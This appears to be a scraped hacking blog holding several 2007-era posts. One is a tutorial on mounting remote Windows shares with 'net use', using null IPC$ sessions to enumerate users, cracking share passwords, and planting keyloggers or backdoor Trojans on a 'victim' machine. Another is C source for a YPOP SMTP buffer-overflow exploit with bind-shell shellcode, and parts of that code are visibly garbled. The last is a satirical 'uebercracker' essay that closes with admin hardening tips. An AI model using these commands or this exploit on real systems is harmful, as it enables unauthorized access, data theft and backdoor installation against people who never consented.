c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!

GO TO CONTENTS

________________________________________________________________________________
_____________________________

Cracking Share passwords

Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me

GO TO CONTENTS

________________________________________________________________________________
______________________________

Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.

GO TO CONTENTS

________________________________________________________________________________
______________________________

Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission.

GO TO CONTENTS

________________________________________________________________________________
_____________________________

Lets Hack - Part 2 Denial of service attack

This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.

The two most common vulnerabilities found in NetBIOS are

Vulnerability 1

Vulnerability 2

Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.

________________________________________________________________________________
______________________________

How to protect yourself

Please visit windowsupdate.microsoft.com and let the windows update itself.

Ypop Smtp Remote Buffer Overflow Exploit

2007-12-02T01:12:00.000-08:00

The Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow.

Example:
Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
504xA CODE

The EIP register will be overwritten and our code will be executed
here is a little exploit

CODE

/*-= ---------------------------------- =-
* = YPOP SMTP Remote Buffer Overflow =
* = BindShell Exploit by cyrex =
* = Tested on Win2k SP4 =
*-= ---------------------------------- =-
* = Info: =
* = If you need more offsets you need =
* = to get the JMP Address of =
* = libcurl.dll and the return address =
* = of it. Try your luck. =
*-= ---------------------------------- =-
* = Usage: =
* = ./ypop -h =
*-= ---------------------------------- =-
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include

//;W32 BindShellcode by cyrex
//;Listen on port 4567
//;uses exit thread

unsigned char shellcode[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\xd7\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00"
"\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";

// Tested on Win2k SP4

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";

int fd,bytes;

void usage(char *prog)
{
printf("Usage: %s \n",prog);
printf("------\n");
printf(" -h e.g (-h 127.0.0.1)\n");
printf(" -p e.g (-p 25\n");
}

int main(int argc, char *argv[])
{
int arg,port,stack,i;
char evilbuf[1024];
char *hostname;
char buffer[300];
struct hostent *he;
struct sockaddr_in client;

printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");
printf(" BindShell Exploit by cyrex\n");
printf("- - - - - - - - - - - - - - - - - - - - - \n");

if(argc<4) arg="getopt(argc," hostname="optarg;" port="atoi(optarg);" he="gethostbyname(hostname))="="NULL)" fd="socket(AF_INET,SOCK_STREAM,0))="="-1){" sin_family =" AF_INET;" sin_port =" htons(port);" sin_addr =" *((struct">h_addr);

if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Can't Connect to %s\n",hostname);
exit(-1);
}

printf("[+] Connected!\n");

if((bytes=recv(fd,buffer,300,0)) == NULL)
{
printf("[-] Error Receiving Welcome\n");
exit(-1);
}
buffer[bytes]='\0';
if((strstr(buffer,"220")==NULL) (strstr(buffer,"YahooPOPs")==NULL) {
printf("[-] Hmm.. you sure this is a SMTP Server?\n");
exit(-1);
}

stack=504-sizeof(shellcode);
memset(evilbuf,0,sizeof(evilbuf));
for(i=0;i nc %s %i or\n",hostname,port);
printf(" -> telnet %s %i\n",hostname,port);

}

How to become a master hacker

2007-12-02T01:11:00.000-08:00

This is a paper will be broken into two parts, one showing 15 easy steps

to becoming a uebercracker and the next part showing how to become a

ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased

by Dan Farmer to refer to some elite (cr/h)acker that is practically

impossible to keep out of the networks.

Here's the steps to becoming a uebercracker.

Step 1. Relax and remain calm. Remember YOU are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and skip

past step 3.

Step 3. You may want to buy Unix manual or book to let you know what

ls,cd,cat does.

Step 4. Read Usenet for the following groups: alt.irc, alt.security,

comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background

in uebercracker culture.

Step 5. Ask on alt.irc how to get and compile the latest IRC client and

connect to IRC.

Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way

there!)

Step 7. Now, sit on #hack and send messages to everyone in the channel

saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks

questions like "Why cant I join #warez?"

Step 8. (Important Step) Send private messages to everyone asking for new

bugs or holes. Here's a good pointer, look around your system for binary

programs suid root (look in Unix manual from step 3 if confused). After

finding a suid root binary, (ie. su, chfn, syslog), tell people you have a

new bug in that program and you wrote a script for it. If they ask how it

works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask

them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file

(ie. a big core file). Tell them it is encrypted or it was messed up and

you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be

obnoxious on #hack otherwise people will look down on you and not give you

anything.)

Step 11. Hopefully you will now have atleast one or two scripts that get

you root on most Unixes. Grab root on your local machines, read your

admin's mail, or even other user's mail, even rm log files and whatever

temps you. (look in Unix manual from step 3 if confused).

Step 12. A good test for true uebercrackerness is to be able to fake mail.

Ask other uebercrackers how to fake mail (because they have had to pass the

same test). Email your admin how "layme" he is and how you got root and how

you erased his files, and have it appear coming from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag

about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are

a uebercracker.)

Step 14. Wait a few months and have all your notes, etc ready in your room

for when the FBI, Secret Service, and other law enforcement agencies

confinscate your equipment. Call eff.org to complain how you were innocent

and how you accidently gotten someone else's account and only looked

because you were curious. (Whatever else that may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you

go back to #hack and brag about how you were busted. YOU are finally a

true Uebercracker.

Now the next part of the paper is top secret. Please only pass to trusted

administrators and friends and even some trusted mailing lists, Usenet

groups, etc. (Make sure no one who is NOT in the inner circle of security

gets this.)

This is broken down on How to Become an UeberAdmin (otherwise know as a

security expert) and How to stop Uebercrackers.

Step 1. Read Unix manual ( a good idea for admins ).

Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install

sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers

now. Rdist scripts is among the favorites for getting root by

uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the

elite Uebercrackers who can break into any site on Internet.

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing

packets. (This only applies to advanced admins who have control of the

router, but this will stop 90% of all uebercrackers from attempting your

site.)

Step 5. Apply all CERT and vendor patches to all of your machines. You have

just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them.

Run tripwire after making sure your binaries are untouched. Run tcp_wrapper

to find if a uebercracker is knocking on your machines. Run ISS to make

sure that all your machines are reasonably secure as far as remote

configuration (ie. your NFS exports and anon FTP site.)

Step 7. If you have done all of the following, you will have stopped 99%

of all uebercrackers. Congrads! (Remember, You are the admin.)

Step 8. Now there is one percent of uebercrackers that have gained

knowledge from reading some security expert's mail (probably gained access

to his mail via NFS exports or the guest account. You know how it is, like

the mechanic that always has a broken car, or the plumber that has the

broken sink, the security expert usually has an open machine.)

Step 9. Here is the hard part is to try to convince these security experts

that they are not so above the average citizen and that by now giving out

their unknown (except for the uebercrackers) security bugs, it would be a

service to Internet. They do not have to post it on Usenet, but share

among many other trusted people and hopefully fixes will come about and

new pressure will be applied to vendors to come out with patches.

Step 10. If you have gained the confidence of enough security experts,

you will know be a looked upto as an elite security administrator that is

able to stop most uebercrackers. The final true test for being a ueberadmin

is to compile a IRC client, go onto #hack and log all the bragging and

help catch the uebercrackers. If a uebercracker does get into your system,

and he has used a new method you have never seen, you can probably tell

your other security admins and get half of the replies like - "That bug

been known for years, there just isn't any patches for it yet. Here's my

fix." and the other half of the replies will be like - "Wow. That is very

impressive. You have just moved up a big notch in my security circle."

VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups

mention anything about that security hole, Flame him for discussing it

since it could bring down Internet and all Uebercrackers will now have it

and the million other reasons to keep everything secret about security.

Well, this paper has shown the finer details of security on Internet. It has

shown both sides of the coin. Three points I would like to make that would

probably clean up most of the security problems on Internet are as the

following:

1. Vendors need to make security a little higher than zero in priority.

If most vendors shipped their Unixes already secure with most known bugs

that have been floating around since the Internet Worm (6 years ago) fixed

and patched, then most uebercrackers would be stuck as new machines get

added to Internet. (I believe Uebercracker is german for "lame copy-cat

that can get root with 3 year old bugs.") An interesting note is that

if you probably check the mail alias for "security@vendor.com", you will

find it points to /dev/null. Maybe with enough mail, it will overfill

/dev/null. (Look in manual if confused.)

2. Security experts giving up the attitude that they are above the normal

Internet user and try to give out information that could lead to pressure

by other admins to vendors to come out with fixes and patches. Most

security experts probably don't realize how far their information has

already spread.

3. And probably one of the more important points is just following the

steps I have outlined for Stopping a Uebercracker.